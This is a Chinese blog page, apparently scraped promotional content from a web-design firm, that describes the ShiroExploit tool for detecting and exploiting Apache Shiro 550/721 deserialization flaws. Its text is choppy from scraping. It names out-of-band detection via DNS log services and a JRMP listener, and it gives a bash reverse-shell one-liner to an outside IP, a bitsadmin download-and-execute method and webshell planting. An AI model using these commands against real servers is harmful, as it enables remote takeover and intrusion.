扫二维码与项目经理沟通
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流
本篇内容主要讲解“Shiro漏洞检测工具ShiroExploit怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Shiro漏洞检测工具ShiroExploit怎么使用”吧!
10年积累的网站设计、成都网站建设经验,可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你,你也不认识我。但先网站制作后付款的网站建设流程,更有高港免费网站建设让你可以放心的选择与我们合作。
支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。
Shiro550
无需提供rememberMe Cookie, Shiro721
需要提供一个有效的rememberMe CookieShiro550
无需选择操作系统类型, Shiro721
需要选择操作系统类型使用 ceye.io 进行漏洞检测
URLDNS
筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 dnslog.cn 进行漏洞检测
dnslog.cn
申请一个 DNS Record。URLDNS
筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 JRMP + dnslog 进行漏洞检测
java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]
开启HttpService/JRMPListener,并按照要求填入相应 IP 和端口HTTPService
默认监听 8080
端口, JRMPListener
默认监听 8088
端口JRMP
的方式进行漏洞检测,可以显著减小 cookie 大小URLDNS
筛选出唯一 Key,然后使用 JRMP
依次为各个 Gadget 生成对应的 JRMPListener使用回显进行漏洞检测
https://blog.csdn.net/fnmsd/article/details/106709736
介绍的方式实现回显,在本地可以测试成功,但是在实际环境中基本不成功(可能是我的姿势有问题,欢迎探讨),所以目前是通过读写文件的方式实现回显,后期可能会加入其它方式反弹shell(linux)
采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1
的方式反弹 shell反弹shell(Windows)
采用 bitsadmin
下载指定 URL 的 exe 文件并执行的方式获取 shell获取Webshell
可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取到此,相信大家对“Shiro漏洞检测工具ShiroExploit怎么使用”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流